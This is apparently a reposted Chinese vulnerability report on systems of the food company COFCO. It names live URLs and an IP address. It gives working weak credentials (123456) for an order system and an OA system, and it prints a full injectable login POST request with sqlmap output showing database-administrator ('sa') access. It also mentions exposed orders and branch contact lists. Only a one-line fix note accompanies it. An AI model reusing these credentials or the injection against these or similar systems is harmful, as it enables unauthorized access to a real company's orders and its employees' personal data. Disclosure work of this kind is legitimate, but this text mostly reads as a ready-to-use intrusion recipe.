中粮集团漏洞打包(订单系统弱口令/泄漏大量订单+某系统post注入/dba+25+全国分公司通讯录)
中粮经销商订单管理系统
https://dmoo.cofco.com/dmoo/jsp/main.jsp
这个应该是未修复,个人感觉应该要改密码
帐号是:张正平(这里打中文,避免被人利用) 123456
看了一下有最新12月1号的订单,订单金额都是10万左右的
=====================================================
中粮期货管理系统post注入 dba
https://219.143.252.76/cn/web/user_login.aspx
POST /cn/web/user_login.aspx HTTP/1.1 Host: 219.143.252.76 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: https://219.143.252.76/cn/web/user_login.aspx Cookie: ASP.NET_SessionId=vr1l5hjwa0ylr4wxxzd0s5oa Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 265 __EVENTTARGET=lbLogin&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTkxNTcxOTIzM2RkkLBByD0zHNG5WTJppj%2FbUg5nd2HffJWrt%2FJHeGaXLpY%3D&__EVENTVALIDATION=%2FwEWBAL2qoSUBgLyj%2FOQAgLAr6WkDALRy8HXAnx0nPAi4SE70vMjy5yYI7%2Bbdcm8lK4p9%2FvbshL%2BET%2FF&tbUserName=test&tbPwd=test
[16:46:51] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows 2003 web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0 back-end DBMS: Microsoft SQL Server 2000 [16:46:51] [INFO] fetching current user [16:46:51] [INFO] resumed: sa current user: 'sa'
===========================================
https://dmoa.cofco.com/seeyon/main.do?method=index
wangm 123456
之前提交的没发现其他分公司,这次居然有其他分公司的通讯录
数了一下 应该是28家好像,这里就表示一下,不导出ex表格了
解决方案:
该修复的还是要认真修复,订单泄漏被操作,口令问题还是很重要
—-想了解更多的企业安全相关处理怎么解决关注<计算机技术网(www.ctvol.com)!!>
本文来自网络收集,不代表计算机技术网立场,如涉及侵权请联系管理员删除。
ctvol管理联系方式QQ:251552304
本文章地址:https://www.ctvol.com/webstt/esecurity/100284.html